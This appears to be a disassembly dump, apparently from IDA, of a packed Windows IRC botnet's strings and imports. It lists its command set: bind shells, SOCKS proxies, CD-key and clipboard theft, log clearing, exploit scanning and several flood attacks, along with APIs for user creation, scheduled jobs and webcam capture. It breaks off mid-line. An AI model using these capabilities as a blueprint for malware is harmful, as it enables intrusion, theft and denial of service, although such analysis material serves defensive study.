:PHONING HOME: hi ;).',0Dh,0Ah,0 ; DATA XREF: sub_401ACD+1C29o align 4 aPhonehome db 'phonehome',0 ; DATA XREF: sub_401ACD+1C12o align 4 aAsc db 'asc',0 ; DATA XREF: sub_401ACD+1BE8o dword_42C78C dd 234032Dh, 6E69616Dh, 202D0302h, 73617243h, 676E6968h ; DATA XREF: sub_401ACD+1B98o dd 746F6220h, 2Eh aCrash db 'crash',0 ; DATA XREF: sub_401ACD+1B82o ; sub_401ACD+1BD2o align 10h aTftp db 'tftp',0 ; DATA XREF: sub_401ACD+1B6Do align 4 aTftpserver db 'tftpserver',0 ; DATA XREF: sub_401ACD+1B58o align 4 aHttp db 'http',0 ; DATA XREF: sub_401ACD+1B43o align 4 aHttpserver db 'httpserver',0 ; DATA XREF: sub_401ACD+1B2Eo align 4 aRlogin db 'rlogin',0 ; DATA XREF: sub_401ACD+1B19o align 10h aRloginserver db 'rloginserver',0 ; DATA XREF: sub_401ACD+1B04o align 10h aCip db 'cip',0 ; DATA XREF: sub_401ACD+1AEFo aCurrentip db 'currentip',0 ; DATA XREF: sub_401ACD+1ADAo align 10h aFdns db 'fdns',0 ; DATA XREF: sub_401ACD+1AC5o align 4 aFlushdns db 'flushdns',0 ; DATA XREF: sub_401ACD+1AB0o align 4 aFarp db 'farp',0 ; DATA XREF: sub_401ACD+1A9Bo align 4 aFlusharp db 'flusharp',0 ; DATA XREF: sub_401ACD+1A86o align 4 aGc db 'gc',0 ; DATA XREF: sub_401ACD+1A71o align 4 aGetclip db 'getclip',0 ; DATA XREF: sub_401ACD+1A5Co unk_42C834 db 2Dh ; - ; DATA XREF: sub_401ACD+1A1Eo db 3, 34h, 2 db 77h ; w db 69h, 73h, 64h db 6Fh ; o db 6Dh, 28h, 73h db 70h ; p db 2 dup(6Fh), 66h db 29h ; ) db 2, 3, 2Dh aSpoofingDisabl db ' Spoofing disabled.',0 aOff db 'off',0 ; DATA XREF: sub_401ACD+1A03o ; sub_401ACD+3CB0o ... aSpoof db 'spoof',0 ; DATA XREF: sub_401ACD+19ECo align 4 unk_42C868 db 2Dh ; - ; DATA XREF: sub_401ACD+19CEo db 3, 34h, 2 db 6Dh ; m db 61h, 69h, 6Eh db 2 db 3, 2Dh, 20h aLoginListCompl db 'Login list complete.',0 align 4 aD_S db '%d. %s',0 ; DATA XREF: sub_401ACD+1996o ; sub_40B1B4+46o align 4 aEmpty db '<Empty>',0 ; DATA XREF: sub_401ACD:loc_403454o dword_42C89C dd 234032Dh, 69676F6Ch, 696C206Eh, 3027473h, 2Dh ; DATA XREF: sub_401ACD+195Co dword_42C8B0 dd 6F6877h ; DATA XREF: sub_401ACD+193Fo dword_42C8B4 dd 234032Dh, 2646D63h, 2D03h ; DATA XREF: sub_401ACD+1934o dword_42C8C0 dd 6F6D6552h, 73206574h, 6C6C6568h, 0 ; DATA XREF: sub_401ACD+192Fo aCmdstop db 'cmdstop',0 ; DATA XREF: sub_401ACD+1916o aOcmd db 'ocmd',0 ; DATA XREF: sub_401ACD+1901o align 10h aOpencmd db 'opencmd',0 ; DATA XREF: sub_401ACD+18ECo aDll db 'dll',0 ; DATA XREF: sub_401ACD+18D7o aTestdlls db 'testdlls',0 ; DATA XREF: sub_401ACD+18C2o align 4 aDrv db 'drv',0 ; DATA XREF: sub_401ACD+18ADo aDriveinfo db 'driveinfo',0 ; DATA XREF: sub_401ACD+1898o align 4 aUp db 'up',0 ; DATA XREF: sub_401ACD+1883o align 4 aUptime db 'uptime',0 ; DATA XREF: sub_401ACD+186Eo align 4 aKey db 'key',0 ; DATA XREF: sub_401ACD+1859o aGetcdkeys db 'getcdkeys',0 ; DATA XREF: sub_401ACD+1844o align 4 aPs db 'ps',0 ; DATA XREF: sub_401ACD+182Fo align 4 aProcs db 'procs',0 ; DATA XREF: sub_401ACD+181Ao align 10h aLsp100 db 'lsp100',0 ; DATA XREF: sub_401ACD+17F0o ; sub_401ACD+1805o align 4 aSi db 'si',0 ; DATA XREF: sub_401ACD+17DBo align 4 aSysinfo db 'sysinfo',0 ; DATA XREF: sub_401ACD+17C6o aNi db 'ni',0 ; DATA XREF: sub_401ACD+17B1o align 4 aNetinfo db 'netinfo',0 ; DATA XREF: sub_401ACD+179Co aClg db 'clg',0 ; DATA XREF: sub_401ACD+1787o aClearlog db 'clearlog',0 ; DATA XREF: sub_401ACD+1772o align 10h aLg db 'lg',0 ; DATA XREF: sub_401ACD+175Do align 4 aLog db 'log',0 ; DATA XREF: sub_401ACD+1748o aAl db 'al',0 ; DATA XREF: sub_401ACD+1733o align 4 aAliases db 'aliases',0 ; DATA XREF: sub_401ACD+171Eo aT: ; DATA XREF: sub_401ACD+1709o ; UPX0:004382F8o ... unicode 0, <t>,0 aThreads db 'threads',0 ; DATA XREF: sub_401ACD+16F4o unk_42C980 db 2Dh ; - ; DATA XREF: sub_401ACD+16C0o db 3, 34h, 2 db 6Dh ; m db 61h, 69h, 6Eh db 2 db 3, 2Dh, 20h aFailedToReboot db 'Failed to reboot system.',0 align 4 unk_42C9A8 db 2Dh ; - ; DATA XREF: sub_401ACD+16B9o db 3, 34h, 2 db 6Dh ; m db 61h, 69h, 6Eh db 2 db 3, 2Dh, 20h aRebootingSyste db 'Rebooting system.',0 align 4 aReboot db 'reboot',0 ; DATA XREF: sub_401ACD+16A2o align 10h aI: ; DATA XREF: sub_401ACD+168Do ; UPX0:00438304o ... unicode 0, <i>,0 aId db 'id',0 ; DATA XREF: sub_401ACD+1678o align 4 aS_1: ; DATA XREF: sub_401ACD+1663o ; UPX0:00438310o ... unicode 0, <s>,0 aStatus db 'status',0 ; DATA XREF: sub_401ACD+164Eo align 4 aQ: ; DATA XREF: sub_401ACD+1639o ; UPX0:off_4382E8o ... unicode 0, <q>,0 aQuit_0 db 'quit',0 ; DATA XREF: sub_401ACD+1624o align 10h aDc db 'dc',0 ; DATA XREF: sub_401ACD+160Fo align 4 aDisconnect db 'disconnect',0 ; DATA XREF: sub_401ACD+15FAo align 10h aR: ; DATA XREF: sub_401ACD+15E5o ; sub_401ACD+3DA9o ... unicode 0, <r>,0 aReconnect db 'reconnect',0 ; DATA XREF: sub_401ACD+15D0o align 10h aExplist db 'explist',0 ; DATA XREF: sub_401ACD+15BBo aExploitlist db 'exploitlist',0 ; DATA XREF: sub_401ACD+15A6o aCbstats db 'cbstats',0 ; DATA XREF: sub_401ACD+1591o aConnectbacksta db 'connectbackstats',0 ; DATA XREF: sub_401ACD+157Co align 10h aTrstats db 'trstats',0 ; DATA XREF: sub_401ACD+1567o aTransferstats db 'transferstats',0 ; DATA XREF: sub_401ACD+1552o align 4 aStats db 'stats',0 ; DATA XREF: sub_401ACD+153Do align 10h aScanstats db 'scanstats',0 ; DATA XREF: sub_401ACD+1528o align 4 dword_42CA6C dd 234032Dh, 6E616373h, 2D0302h ; DATA XREF: sub_401ACD+151Do aScan_0 db 'Scan',0 ; DATA XREF: sub_401ACD+1518o align 10h aScanstop db 'scanstop',0 ; DATA XREF: sub_401ACD+14FFo align 4 dword_42CA8C dd 234032Dh, 75636573h, 3026572h, 2Dh ; DATA XREF: sub_401ACD+14F4o aSecure_0 db 'Secure',0 ; DATA XREF: sub_401ACD+14EFo align 4 aSecurestop db 'securestop',0 ; DATA XREF: sub_401ACD+14D6o align 10h dword_42CAB0 dd 234032Dh, 6E6F6C63h, 3027365h, 2Dh ; DATA XREF: sub_401ACD+14CBo aClone db 'Clone',0 ; DATA XREF: sub_401ACD+14C6o align 4 aClonestop db 'clonestop',0 ; DATA XREF: sub_401ACD+14ADo align 4 aPsstop db 'psstop',0 ; DATA XREF: sub_401ACD+1498o align 4 aProcsstop db 'procsstop',0 ; DATA XREF: sub_401ACD+1483o align 4 aFfstop db 'ffstop',0 ; DATA XREF: sub_401ACD+146Eo align 10h aFindfilestop db 'findfilestop',0 ; DATA XREF: sub_401ACD+1459o align 10h dword_42CB00 dd 234032Dh, 70746674h, 2D030264h, 0 ; DATA XREF: sub_401ACD+144Eo aTftpstop db 'tftpstop',0 ; DATA XREF: sub_401ACD+1430o align 4 aPingstop db 'pingstop',0 ; DATA XREF: sub_401ACD+1407o align 4 aUdpstop db 'udpstop',0 ; DATA XREF: sub_401ACD+13DEo aWisdomstop db 'wisdomstop',0 ; DATA XREF: sub_401ACD+13B5o align 4 aTsunamistop db 'tsunamistop',0 ; DATA XREF: sub_401ACD+138Co unk_42CB48 db 2Dh ; - ; DATA XREF: sub_401ACD+1372o db 3, 34h, 2 db 64h ; d db 64h, 6Fh, 73h db 2 db 3, 2Dh, 20h aAllPacketingAc db 'All packeting activity has been halted.',0 dword_42CB7C dd 234032Dh, 64736977h, 3026D6Fh, 2Dh ; DATA XREF: sub_401ACD+1337o ; sub_401ACD+13D3o dword_42CB8C dd 64736957h, 61206D6Fh, 63617474h, 6Bh ; DATA XREF: sub_401ACD+1332o ; sub_401ACD+13CEo dword_42CB9C dd 234032Dh, 6E757374h, 2696D61h, 2D03h ; DATA XREF: sub_401ACD+1319o ; sub_401ACD+13AAo dword_42CBAC dd 6E757354h, 20696D61h, 6F6F6C66h, 64h ; DATA XREF: sub_401ACD+1314o ; sub_401ACD+13A5o dword_42CBBC dd 234032Dh, 676E6970h, 2D0302h ; DATA XREF: sub_401ACD+12B9o ; sub_401ACD+1425o dword_42CBC8 dd 676E6950h, 6F6C6620h, 646Fh ; DATA XREF: sub_401ACD+12B4o ; sub_401ACD+1420o dword_42CBD4 dd 234032Dh, 2706475h, 2D03h ; DATA XREF: sub_401ACD+129Bo ; sub_401ACD+13FCo dword_42CBE0 dd 20504455h, 6F6F6C66h, 64h ; DATA XREF: sub_401ACD+1296o ; sub_401ACD+13F7o aPacketstop db 'packetstop',0 ; DATA XREF: sub_401ACD+1236o align 4 dword_42CBF8 dd 234032Dh, 6B6E6F77h, 2D0302h ; DATA XREF: sub_401ACD+122Bo ; sub_401ACD+12F8o dword_42CC04 dd 6B6E6F57h, 6F6C6620h, 646Fh ; DATA XREF: sub_401ACD+1226o ; sub_401ACD+12F3o aWonkstop db 'wonkstop',0 ; DATA XREF: sub_401ACD+120Do align 4 dword_42CC1C dd 234032Dh, 67726174h, 3023361h, 2Dh ; DATA XREF: sub_401ACD+1202o ; sub_401ACD+12DAo dword_42CC2C dd 67726154h, 66203361h, 646F6F6Ch, 0 ; DATA XREF: sub_401ACD+11FDo ; sub_401ACD+12D5o aTarga3stop db 'targa3stop',0 ; DATA XREF: sub_401ACD+11E4o align 4 dword_42CC48 dd 234032Dh, 73796B73h, 3026E79h, 2Dh ; DATA XREF: sub_401ACD+11D9o ; sub_401ACD+1358o dword_42CC58 dd 53796B53h, 66206E79h, 646F6F6Ch, 0 ; DATA XREF: sub_401ACD+11D4o ; sub_401ACD+1353o aSkysynstop db 'skysynstop',0 ; DATA XREF: sub_401ACD+11BBo align 4 dword_42CC74 dd 234032Dh, 26E7973h, 2D03h ; DATA XREF: sub_401ACD+11B0o ; sub_401ACD+127Ao dword_42CC80 dd 206E7953h, 6F6F6C66h, 64h ; DATA XREF: sub_401ACD+11ABo ; sub_401ACD+1275o aSynstop db 'synstop',0 ; DATA XREF: sub_401ACD+1192o dword_42CC94 dd 234032Dh, 736F6464h, 2D0302h ; DATA XREF: sub_401ACD+1187o ; sub_401ACD+125Co dword_42CCA0 dd 536F4444h, 6F6C6620h, 646Fh ; DATA XREF: sub_401ACD+1182o ; sub_401ACD+1257o dword_42CCAC dd 736F6464h, 6F74732Eh, 70h ; DATA XREF: sub_401ACD+1169o dword_42CCB8 dd 234032Dh, 69646572h, 74636572h, 2D0302h ; DATA XREF: sub_401ACD+115Eo dword_42CCC8 dd 20504354h, 69646572h, 74636572h, 0 ; DATA XREF: sub_401ACD+1159o aRedirectstop db 'redirectstop',0 ; DATA XREF: sub_401ACD+1140o align 4 dword_42CCE8 dd 234032Dh, 2676F6Ch, 2D03h ; DATA XREF: sub_401ACD+1135o dword_42CCF4 dd 20676F4Ch, 7473696Ch, 0 ; DATA XREF: sub_401ACD+1130o aLogstop db 'logstop',0 ; DATA XREF: sub_401ACD+1117o dword_42CD08 dd 234032Dh, 70747468h, 2D030264h, 0 ; DATA XREF: sub_401ACD+110Co aHttpstop db 'httpstop',0 ; DATA XREF: sub_401ACD+10EEo align 4 dword_42CD24 dd 234032Dh, 676F6C72h, 2646E69h, 2D03h ; DATA XREF: sub_401ACD+10E3o aRloginstop db 'rloginstop',0 ; DATA XREF: sub_401ACD+10C5o align 10h dword_42CD40 dd 234032Dh, 6B636F73h, 3023473h, 2Dh ; DATA XREF: sub_401ACD+10BDo aSocks4stop db 'socks4stop',0 ; DATA XREF: sub_401ACD+109Fo align 4 aS4 db 's4',0 ; DATA XREF: sub_401ACD+108Ao align 10h aSocks4 db 'socks4',0 ; DATA XREF: sub_401ACD+1075o align 4 dword_42CD68 dd 234032Dh, 646E6962h, 6C656873h, 2D03026Ch, 0 ; DATA XREF: sub_401ACD+1053o aServer_0 db 'Server',0 ; DATA XREF: sub_401ACD+104Eo ; sub_401ACD+10B8o ... align 4 aBindshellstop db 'bindshellstop',0 ; DATA XREF: sub_401ACD+1035o align 4 aBd db 'bd',0 ; DATA XREF: sub_401ACD+1020o align 4 aBindshell db 'bindshell',0 ; DATA XREF: sub_401ACD+100Bo align 4 aUnsec db 'unsec',0 ; DATA XREF: sub_401ACD+FF6o align 4 aUnsecure db 'unsecure',0 ; DATA XREF: sub_401ACD+FE1o align 4 aSec db 'sec',0 ; DATA XREF: sub_401ACD+FCCo ; sub_401ACD+2D6Ao aSecure db 'secure',0 ; DATA XREF: sub_401ACD+FB7o ; sub_401ACD+2D59o align 4 aSt db 'st',0 ; DATA XREF: sub_401ACD+FA2o align 4 aSpeedtest db 'speedtest',0 ; DATA XREF: sub_401ACD+F8Do align 4 aDed db 'ded',0 ; DATA XREF: sub_401ACD+F78o aDedication db 'dedication',0 ; DATA XREF: sub_401ACD+F63o align 4 aVer db 'ver',0 ; DATA XREF: sub_401ACD+F4Eo aVersion db 'version',0 ; DATA XREF: sub_401ACD+F39o aLo db 'lo',0 ; DATA XREF: sub_401ACD+F24o align 4 aLogout db 'logout',0 ; DATA XREF: sub_401ACD+F0Fo align 4 aD: ; DATA XREF: sub_401ACD+EFAo ; UPX0:00438314o ... unicode 0, <d>,0 aDie db 'die',0 ; DATA XREF: sub_401ACD+EE5o aRn db 'rn',0 ; DATA XREF: sub_401ACD+ED0o align 4 aRndnick db 'rndnick',0 ; DATA XREF: sub_401ACD+EB8o a63 db '63',0 ; DATA XREF: sub_401ACD+D85o align 4 asc_42CE14: ; DATA XREF: sub_401ACD+D5Do unicode 0, <)>,0 aChr db '$chr(',0 ; DATA XREF: sub_401ACD+D20o align 10h aServer_1 db '$server',0 ; DATA XREF: sub_401ACD+D15o aRndnick_0 db '$rndnick',0 ; DATA XREF: sub_401ACD+D04o align 4 aChan db '$chan',0 ; DATA XREF: sub_401ACD+CE8o align 4 aUser_0 db '$user',0 ; DATA XREF: sub_401ACD+CD7o align 4 aMe db '$me',0 ; DATA XREF: sub_401ACD+CC5o aD_0 db '$%d',0 ; DATA XREF: sub_401ACD+C57o aD_1 db '$%d-',0 ; DATA XREF: sub_401ACD+B93o align 4 asc_42CE54: ; DATA XREF: sub_401ACD+ABBo ; UPX0:0043832Co ... unicode 0, <l>,0 unk_42CE58 db 2Dh ; - ; DATA XREF: sub_401ACD+A80o db 3, 34h, 2 db 64h ; d db 2 dup(63h), 2 db 3 aChatFailedByUn db '- Chat failed by unauthorized user: %s.',0 align 4 unk_42CE8C db 2Dh ; - ; DATA XREF: sub_401ACD+A6Fo db 3, 34h, 2 db 64h ; d db 2 dup(63h), 2 db 3 aChatAlreadyAct db '- Chat already active with user: %s.',0 align 4 unk_42CEBC db 2Dh ; - ; DATA XREF: sub_401ACD+A5Eo db 3, 34h, 2 db 64h ; d db 2 dup(63h), 2 db 3 aFailedToSta_31 db '- Failed to start chat thread, error: <%d>.',0 align 4 unk_42CEF4 db 2Dh ; - ; DATA XREF: sub_401ACD+9EFo db 3, 34h, 2 db 64h ; d db 2 dup(63h), 2 db 3 aChatFromUserS_ db '- Chat from user: %s.',0 align 4 aChat db 'CHAT',0 ; DATA XREF: sub_401ACD+958o align 4 unk_42CF1C db 2Dh ; - ; DATA XREF: sub_401ACD+938o db 3, 34h, 2 db 64h ; d db 2 dup(63h), 2 db 3 aReceiveFileSFa db '- Receive file: ',27h,'%s',27h,' failed from unauthorized user: %s.',0 align 10h unk_42CF60 db 2Dh ; - ; DATA XREF: sub_401ACD+920o db 3, 34h, 2 db 64h ; d db 2 dup(63h), 2 db 3 aFailedToSta_32 db '- Failed to start transfer thread, error: <%d>.',0 align 4 dword_42CF9C dd 49544F4Eh, 25204543h, 13A2073h, 474E4950h, 1732520h ; DATA XREF: sub_401ACD+90Fo dd 0A0Dh dword_42CFB4 dd 4E495001h, 47h ; DATA XREF: sub_401ACD+8DBo dword_42CFBC dd 49544F4Eh, 25204543h, 13A2073h, 53524556h, 204E4F49h ; DATA XREF: sub_401ACD+8D0o dd 0D017325h, 0Ah dword_42CFD8 dd 52455601h, 4E4F4953h, 1 ; DATA XREF: sub_401ACD+89Fo dword_42CFE4 dd 23h ; DATA XREF: sub_401ACD+816o ; sub_40CA80+1Bo unk_42CFE8 db 2Dh ; - ; DATA XREF: sub_401ACD+785o db 3, 34h, 2 db 64h ; d db 2 dup(63h), 2 db 3 aReceiveFileSFr db '- Receive file: ',27h,'%s',27h,' from user: %s.',0 align 4 aS_2 db '%s',0 ; DATA XREF: sub_401ACD+706o ; sub_401ACD+995o ... align 4 aSend_0 db 'SEND',0 ; DATA XREF: sub_401ACD+6DFo align 4 dword_42D024 dd 43434401h, 0 ; DATA XREF: sub_401ACD+6C1o dword_42D02C dd 323333h ; DATA XREF: sub_401ACD+64Bo ; sub_401ACD+ADDo ... aNotice db 'NOTICE',0 ; DATA XREF: sub_401ACD+629o ; sub_409A73+Fo align 4 aPrivmsg db 'PRIVMSG',0 ; DATA XREF: sub_401ACD+61Do ; sub_409A73+16o unk_42D040 db 2Dh ; - ; DATA XREF: sub_401ACD+5CCo db 3, 34h, 2 db 6Dh ; m db 61h, 69h, 6Eh db 2 db 3, 2Dh, 20h aUserSLoggedOut db 'User: %s logged out.',0 align 4 unk_42D064 db 2Dh ; - ; DATA XREF: sub_401ACD+5A5o db 3, 34h, 2 db 6Dh ; m db 61h, 69h, 6Eh db 2 db 3, 2Dh, 20h aJoinedChanne_0 db 'Joined channel: %s.',0 a353 db '353',0 ; DATA XREF: sub_401ACD+574o aQuit db 'QUIT',0 ; DATA XREF: sub_401ACD+537o ; sub_40E992+5DEo align 10h aPart db 'PART',0 ; DATA XREF: sub_401ACD+526o ; sub_401ACD+5E9o align 4 aSS db ':%s%s',0 ; DATA XREF: sub_401ACD+4FEo align 10h aNick db 'NICK',0 ; DATA XREF: sub_401ACD+3D0o align 4 aNoticeSS db 'NOTICE %s :%s',0Dh,0Ah,0 ; DATA XREF: sub_401ACD+371o ; sub_401ACD+60Do unk_42D0B8 db 2Dh ; - ; DATA XREF: sub_401ACD+355o ; sub_401ACD+2EBDo ... db 3, 34h, 2 db 6Dh ; m db 61h, 69h, 6Eh db 2 db 3, 2Dh, 20h aUserSLoggedO_0 db 'User %s logged out.',0 aKick db 'KICK',0 ; DATA XREF: sub_401ACD+2E4o align 10h aNickS db 'NICK %s',0Dh,0Ah,0 ; DATA XREF: sub_401ACD+28Do ; sub_401ACD+7C8Fo ... align 4 a433 db '433',0 ; DATA XREF: sub_401ACD+262o ; sub_4177D0:loc_417838o a@: ; DATA XREF: sub_401ACD+23Ao unicode 0, <@>,0 a302 db '302',0 ; DATA XREF: sub_401ACD+22Ao a005 db '005',0 ; DATA XREF: sub_401ACD+215o a001 db '001',0 ; DATA XREF: sub_401ACD+200o aJoinSS db 'JOIN %s %s',0Dh,0Ah,0 ; DATA XREF: sub_401ACD+1E4o ; sub_401ACD+3B7o ... align 10h aPongS db 'PONG %s',0Dh,0Ah,0 ; DATA XREF: sub_401ACD+1C3o align 4 aPing db 'PING',0 ; DATA XREF: sub_401ACD+1A9o ; sub_4177D0+50o align 4 asc_42D124: ; DATA XREF: sub_401ACD+19Ao ; sub_401ACD+7DAEo unicode 0, <!>,0 asc_42D128: ; DATA XREF: sub_401ACD+A8o ; sub_401ACD+E5Do ... unicode 0, < >,0 asc_42D12C db ' :',0 ; DATA XREF: sub_401ACD+86o ; sub_401ACD:loc_402602o align 10h aSSS_0 db '%s %s :%s',0Dh,0Ah,0 ; DATA XREF: sub_409A73+5Do aCapgetdriverde db 'capGetDriverDescriptionA',0 ; DATA XREF: sub_409B13+C7Fo align 4 aCapcreatecaptu db 'capCreateCaptureWindowA',0 ; DATA XREF: sub_409B13+C77o aAvicap32_dll db 'avicap32.dll',0 ; DATA XREF: sub_409B13:loc_40A77Do align 10h aSqldisconnect db 'SQLDisconnect',0 ; DATA XREF: sub_409B13+C15o align 10h aSqlfreehandle db 'SQLFreeHandle',0 ; DATA XREF: sub_409B13+C08o align 10h aSqlallochandle db 'SQLAllocHandle',0 ; DATA XREF: sub_409B13+BFBo align 10h aSqlexecdirect db 'SQLExecDirect',0 ; DATA XREF: sub_409B13+BEEo align 10h aSqlsetenvattr db 'SQLSetEnvAttr',0 ; DATA XREF: sub_409B13+BE1o align 10h aSqldriverconne db 'SQLDriverConnect',0 ; DATA XREF: sub_409B13+BD9o align 4 aOdbc32_dll db 'odbc32.dll',0 ; DATA XREF: sub_409B13:loc_40A6DFo align 10h aShchangenotify db 'SHChangeNotify',0 ; DATA XREF: sub_409B13+B97o align 10h aShellexecutea db 'ShellExecuteA',0 ; DATA XREF: sub_409B13+B8Fo align 10h aShell32_dll db 'shell32.dll',0 ; DATA XREF: sub_409B13:loc_40A695o aWnetcancelco_0 db 'WNetCancelConnection2W',0 ; DATA XREF: sub_409B13+B3Do align 4 aWnetcancelconn db 'WNetCancelConnection2A',0 ; DATA XREF: sub_409B13+B30o align 4 aWnetaddconne_0 db 'WNetAddConnection2W',0 ; DATA XREF: sub_409B13+B23o aWnetaddconnect db 'WNetAddConnection2A',0 ; DATA XREF: sub_409B13+B1Bo aMpr_dll db 'mpr.dll',0 ; DATA XREF: sub_409B13:loc_40A621o aDeleteipnetent db 'DeleteIpNetEntry',0 ; DATA XREF: sub_409B13+AD9o align 10h aGetipnettable db 'GetIpNetTable',0 ; DATA XREF: sub_409B13+AD1o align 10h aIphlpapi_dll db 'iphlpapi.dll',0 ; DATA XREF: sub_409B13:loc_40A5D7o align 10h aDnsflushreso_0 db 'DnsFlushResolverCacheEntry_A',0 ; DATA XREF: sub_409B13+A8Fo align 10h aDnsflushresolv db 'DnsFlushResolverCache',0 ; DATA XREF: sub_409B13+A87o align 4 aDnsapi_dll db 'dnsapi.dll',0 ; DATA XREF: sub_409B13:loc_40A58Do align 4 aNetwkstagetinf db 'NetWkstaGetInfo',0 ; DATA XREF: sub_409B13+9F9o aNetmessagebuff db 'NetMessageBufferSend',0 ; DATA XREF: sub_409B13+9ECo ; sub_4185A5+65o align 4 aNetusergetinfo db 'NetUserGetInfo',0 ; DATA XREF: sub_409B13+9DFo align 4 aNetuserenum db 'NetUserEnum',0 ; DATA XREF: sub_409B13+9D2o aNetuserdel db 'NetUserDel',0 ; DATA XREF: sub_409B13+9C5o align 4 aNetuseradd db 'NetUserAdd',0 ; DATA XREF: sub_409B13+9B8o align 10h aNetremotetod db 'NetRemoteTOD',0 ; DATA XREF: sub_409B13+9ABo align 10h aNetapibufferfr db 'NetApiBufferFree',0 ; DATA XREF: sub_409B13+99Eo align 4 aNetschedulejob db 'NetScheduleJobAdd',0 ; DATA XREF: sub_409B13+991o align 4 aNetshareenum db 'NetShareEnum',0 ; DATA XREF: sub_409B13+984o align 4 aNetsharedel db 'NetShareDel',0 ; DATA XREF: sub_409B13+977o aNetshareadd db 'NetShareAdd',0 ; DATA XREF: sub_409B13+96Fo aNetapi32_dll db 'netapi32.dll',0 ; DATA XREF: sub_409B13:loc_40A471o ; sub_4185A5+58o align 10h aIcmpsendecho db 'IcmpSendEcho',0 ; DATA XREF: sub_409B13+921o align 10h aIcmpclosehandl db 'IcmpCloseHandle',0 ; DATA XREF: sub_409B13+914o aIcmpcreatefile db 'IcmpCreateFile',0 ; DATA XREF: sub_409B13+90Co align 10h aIcmp_dll db 'icmp.dll',0 ; DATA XREF: sub_409B13:loc_40A412o align 4 aMozilla4_0Comp db 'Mozilla/4.0 (compatible)',0 ; DATA XREF: sub_409B13+8D2o align 4 aInternetcloseh db 'InternetCloseHandle',0 ; DATA XREF: sub_409B13+860o aInternetreadfi db 'InternetReadFile',0 ; DATA XREF: sub_409B13+853o align 10h aInternetcracku db 'InternetCrackUrlA',0 ; DATA XREF: sub_409B13+846o align 4 aInternetopenur db 'InternetOpenUrlA',0 ; DATA XREF: sub_409B13+839o align 4 aInternetopena db 'InternetOpenA',0 ; DATA XREF: sub_409B13+82Co align 4 aInternetconnec db 'InternetConnectA',0 ; DATA XREF: sub_409B13+81Fo align 4 aHttpsendreques db 'HttpSendRequestA',0 ; DATA XREF: sub_409B13+812o align 10h aHttpopenreques db 'HttpOpenRequestA',0 ; DATA XREF: sub_409B13+805o align 4 aInternetgetc_0 db 'InternetGetConnectedStateEx',0 ; DATA XREF: sub_409B13+7F8o aInternetgetcon db 'InternetGetConnectedState',0 ; DATA XREF: sub_409B13+7F0o align 4 aWininet_dll db 'wininet.dll',0 ; DATA XREF: sub_409B13:loc_40A2F2o aClosesocket db 'closesocket',0 ; DATA XREF: sub_409B13+6A6o aGetpeername db 'getpeername',0 ; DATA XREF: sub_409B13+699o aGethostbyaddr db 'gethostbyaddr',0 ; DATA XREF: sub_409B13+68Co align 10h aGethostbyname db 'gethostbyname',0 ; DATA XREF: sub_409B13+67Fo align 10h aGethostname db 'gethostname',0 ; DATA XREF: sub_409B13+672o aGetsockname db 'getsockname',0 ; DATA XREF: sub_409B13+665o aSetsockopt db 'setsockopt',0 ; DATA XREF: sub_409B13+658o align 4 aAccept db 'accept',0 ; DATA XREF: sub_409B13+64Bo align 4 aListen db 'listen',0 ; DATA XREF: sub_409B13+63Eo align 4 aSelect db 'select',0 ; DATA XREF: sub_409B13+631o align 4 aBind db 'bind',0 ; DATA XREF: sub_409B13+629o align 4 aRecvfrom db 'recvfrom',0 ; DATA XREF: sub_409B13+617o align 10h aRecv db 'recv',0 ; DATA XREF: sub_409B13+60Ao align 4 aSendto db 'sendto',0 ; DATA XREF: sub_409B13+5FDo align 10h aNtohl db 'ntohl',0 ; DATA XREF: sub_409B13+5E3o align 4 aNtohs db 'ntohs',0 ; DATA XREF: sub_409B13+5D6o align 10h aHtonl db 'htonl',0 ; DATA XREF: sub_409B13+5C9o align 4 aHtons db 'htons',0 ; DATA XREF: sub_409B13+5BCo align 10h aInet_addr db 'inet_addr',0 ; DATA XREF: sub_409B13+5AFo align 4 aInet_ntoa db 'inet_ntoa',0 ; DATA XREF: sub_409B13+5A2o align 4 aConnect db 'connect',0 ; DATA XREF: sub_409B13+595o aIoctlsocket db 'ioctlsocket',0 ; DATA XREF: sub_409B13+588o aSocket db 'socket',0 ; DATA XREF: sub_409B13+57Bo align 4 aWsacleanup db 'WSACleanup',0 ; DATA XREF: sub_409B13+56Eo align 10h aWsagetlasterro db 'WSAGetLastError',0 ; DATA XREF: sub_409B13+561o aWsaioctl db 'WSAIoctl',0 ; DATA XREF: sub_409B13+554o align 4 a__wsafdisset db '__WSAFDIsSet',0 ; DATA XREF: sub_409B13+547o align 4 aWsaasyncselect db 'WSAAsyncSelect',0 ; DATA XREF: sub_409B13+53Ao align 4 aWsasocketa db 'WSASocketA',0 ; DATA XREF: sub_409B13+52Do align 4 aWsastartup db 'WSAStartup',0 ; DATA XREF: sub_409B13+525o align 4 aWs2_32_dll db 'ws2_32.dll',0 ; DATA XREF: sub_409B13+514o align 10h aDeleteobject db 'DeleteObject',0 ; DATA XREF: sub_409B13+4A1o align 10h aDeletedc db 'DeleteDC',0 ; DATA XREF: sub_409B13+494o align 4 aBitblt db 'BitBlt',0 ; DATA XREF: sub_409B13+487o align 4 aSelectobject db 'SelectObject',0 ; DATA XREF: sub_409B13+47Ao align 4 aGetdibcolortab db 'GetDIBColorTable',0 ; DATA XREF: sub_409B13+46Do align 4 aGetdevicecaps db 'GetDeviceCaps',0 ; DATA XREF: sub_409B13+460o align 4 aCreatecompatib db 'CreateCompatibleDC',0 ; DATA XREF: sub_409B13+453o align 4 aCreatedibsecti db 'CreateDIBSection',0 ; DATA XREF: sub_409B13+446o align 10h aCreatedca db 'CreateDCA',0 ; DATA XREF: sub_409B13+43Eo align 4 aGdi32_dll db 'gdi32.dll',0 ; DATA XREF: sub_409B13:loc_409F40o align 4 aGetusernamea db 'GetUserNameA',0 ; DATA XREF: sub_409B13:loc_409F18o align 4 aIsvalidsecurit db 'IsValidSecurityDescriptor',0 ; DATA XREF: sub_409B13+3ADo align 4 aEnumservicesst db 'EnumServicesStatusA',0 ; DATA XREF: sub_409B13+3A0o aCloseserviceha db 'CloseServiceHandle',0 ; DATA XREF: sub_409B13+393o align 4 aDeleteservice db 'DeleteService',0 ; DATA XREF: sub_409B13+386o align 4 aControlservice db 'ControlService',0 ; DATA XREF: sub_409B13+379o align 4 aStartservicea db 'StartServiceA',0 ; DATA XREF: sub_409B13+36Co align 4 aOpenservicea db 'OpenServiceA',0 ; DATA XREF: sub_409B13+35Fo align 4 aOpenscmanagera db 'OpenSCManagerA',0 ; DATA XREF: sub_409B13:loc_409E6Ao align 4 aAdjusttokenpri db 'AdjustTokenPrivileges',0 ; DATA XREF: sub_409B13+327o align 4 aLookupprivileg db 